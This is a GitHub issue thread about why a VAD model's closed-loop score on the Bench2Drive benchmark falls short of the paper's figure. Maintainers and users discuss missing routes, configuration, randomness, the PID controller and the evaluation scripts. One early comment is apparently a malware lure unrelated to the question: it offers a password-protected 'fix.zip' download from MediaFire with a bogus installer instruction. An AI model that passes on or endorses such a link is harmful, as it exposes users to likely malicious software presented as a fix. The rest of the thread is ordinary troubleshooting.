### ISSUE TITLE
VAD闭环评测结果和论文中对不齐

### ISSUE THREAD

**Issue by AvinsWang** [Thinklab-SJTU/Bench2Drive#77]
使用vad_b2d_agent.py, vad_b2d_base.pth 在220条路线上评测，分数只有34.27和论文39.42差得挺大，这是什么原因？
[eval_latest.json](https://github.com/user-attachments/files/16747200/eval_latest.json)

**Comment by seeronline** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by jiaxiaosong1002** [comment]
@AvinsWang We provide the eval jsons of the latest version Bench2Drive in Bench2DriveZoo.

It could be because 1. missing routes 2. wrong configuration 3. randomness.  For those crashed routes, we generally try multiple times until we are sure it is impossible to finish.

**Comment by AvinsWang** [comment]
Thanks for your advices, I'll try it again.

**Comment by czg2066** [comment]
> Thanks for your advices, I'll try it again.

佬，请问您是怎么完成VAD的闭环测试的代码的？agent.py部分是自己实现吗，还是只需要链接到VAD的哪部分代码？VAD的输出似乎是规划的轨迹而不是控制动作，论文里也没有提及是怎么将规矩转成动作的，您是怎么将估计转换成控制行为的，使用了VADv2提到的PID控制吗？非常期待您的回复 。

**Comment by jayyoung0802** [comment]
The PID refers to [pid_controller](https://github.com/Thinklab-SJTU/Bench2DriveZoo/blob/uniad/vad/team_code/pid_controller.py), and we use default parameters in PID.

**Comment by AvinsWang** [comment]
> > Thanks for your advices, I'll try it again.
> 
> 佬，请问您是怎么完成VAD的闭环测试的代码的？agent.py部分是自己实现吗，还是只需要链接到VAD的哪部分代码？VAD的输出似乎是规划的轨迹而不是控制动作，论文里也没有提及是怎么将规矩转成动作的，您是怎么将估计转换成控制行为的，使用了VADv2提到的PID控制吗？非常期待您的回复 。

我的实验是参照官方实验配置, 不用自己重写; 航点waypoints转换成控制信号使用官方预设的PID, 这部分也不用重写. 总之, 参考官方配置运行leaderboard/scripts/run_evaluation_multi_vad.sh 然后将结果汇总leaderboard/scripts/merge_statistics.py 得到最终结果即可;

在实验中, 发现实验结果和官方提供log中几个场景对不上, 且同一条线路两次结果可能都不一样, 所以一直没有和官方对齐, 官方应该没有跑多次求平均, 或许应该求多次平均值更加稳定, 可以参考https://github.com/carla-simulator/leaderboard/issues/80; 其他, 在运行某个场景可能会因为规划错误或者静止时间太久导致crash, 导致carla服务端崩溃, 影响闭环评测的效率.  ps. 这个是2个月前的项目, 鉴于评测对不齐和使用官方的10000+数据训练的模型无法达到/超过SOTA已经做别的项目了.

**Comment by czg2066** [comment]
> > > Thanks for your advices, I'll try it again.
> > 
> > 
> > 佬，请问您是怎么完成VAD的闭环测试的代码的？agent.py部分是自己实现吗，还是只需要链接到VAD的哪部分代码？VAD的输出似乎是规划的轨迹而不是控制动作，论文里也没有提及是怎么将规矩转成动作的，您是怎么将估计转换成控制行为的，使用了VADv2提到的PID控制吗？非常期待您的回复 。
> 
> 我的实验是参照官方实验配置, 不用自己重写; 航点waypoints转换成控制信号使用官方预设的PID, 这部分也不用重写. 总之, 参考官方配置运行leaderboard/scripts/run_evaluation_multi_vad.sh 然后将结果汇总leaderboard/scripts/merge_statistics.py 得到最终结果即可;
> 
> 在实验中, 发现实验结果和官方提供log中几个场景对不上, 且同一条线路两次结果可能都不一样, 所以一直没有和官方对齐, 官方应该没有跑多次求平均, 或许应该求多次平均值更加稳定, 可以参考[carla-simulator/leaderboard#80](https://github.com/carla-simulator/leaderboard/issues/80); 其他, 在运行某个场景可能会因为规划错误或者静止时间太久导致crash, 导致carla服务端崩溃, 影响闭环评测的效率. ps. 这个是2个月前的项目, 鉴于评测对不齐和使用官方的10000+数据训练的模型无法达到/超过SOTA已经做别的项目了.

好的，谢谢您。我成功跑通了VAD，它的效果确实不尽人意，Bench2Drive的场景比[Leaderboard](https://leaderboard.carla.org/)难上不少。
